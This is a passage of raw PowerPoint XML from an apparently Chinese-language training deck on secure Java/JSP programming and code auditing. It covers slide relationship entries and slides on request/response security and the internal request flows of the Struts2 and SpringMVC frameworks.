<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide39.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.pn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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.pn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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.pn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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/></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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/></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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/></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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/></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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/></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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/></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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/></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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/></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61.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/></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62.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/></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63.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/></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64.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.pn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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide67.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/></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69.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/></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70.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/></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notesSlide" Target="../notesSlides/notesSlide72.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide74.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide73.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/></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notesSlide" Target="../notesSlides/notesSlide75.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/></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notesSlide" Target="../notesSlides/notesSlide80.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/></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notesSlide" Target="../notesSlides/notesSlide85.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide86.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide88.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide87.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide89.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide88.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.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90.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide89.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide91.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide90.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide92.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide91.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide93.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide92.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide94.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide93.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide95.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide94.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide96.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide95.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide97.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide96.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide98.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide97.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/></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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全编程与代码审计</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="直接连接符 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596598" y="2714626"/>
            <a:ext cx="6189980" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>页面输出的内容为：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会不会出现问题？？？ </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="922020" y="1479550"/>
            <a:ext cx="6276340" cy="1257300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Mvc框架存在的问题:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于MVC的框架的实现各自不同，某些东西因为其越来越强大，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>而衍生出来越来越多的安全问题，典型的由于安全问题处理不当造</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>成近期无数互联网站被黑阔攻击的MVC框架便是Struts2。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Spring Mvc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>STRUTS2框架内部流程：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1. 客户端发送请求的tomcat服务器。服务器接受，将</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HttpServletRequest传进来。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2. 请求经过一系列过滤器(如：ActionContextCleanUp、</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SimeMesh等)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3. FilterDispatcher被调用。FilterDispatcher调用ActionMapper</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>来决定这个请求是否要调用某个Action</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4. ActionMapper决定调用某个ActionFilterDispatcher把请求交</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>给ActionProxy</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>STRUTS2框架内部流程：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5. ActionProxy通过Configuration Manager查看struts.xml，从</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>而找到相应的Action类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6. ActionProxy创建一个ActionInvocation对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7. ActionInvocation对象回调Action的execute方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>8. Action执行完毕后，ActionInvocation根据返回的字符串，找</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>到对应的result。然后将Result内容通过HttpServletResponse返</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>回给服务器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SpringMVC框架内部流程：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
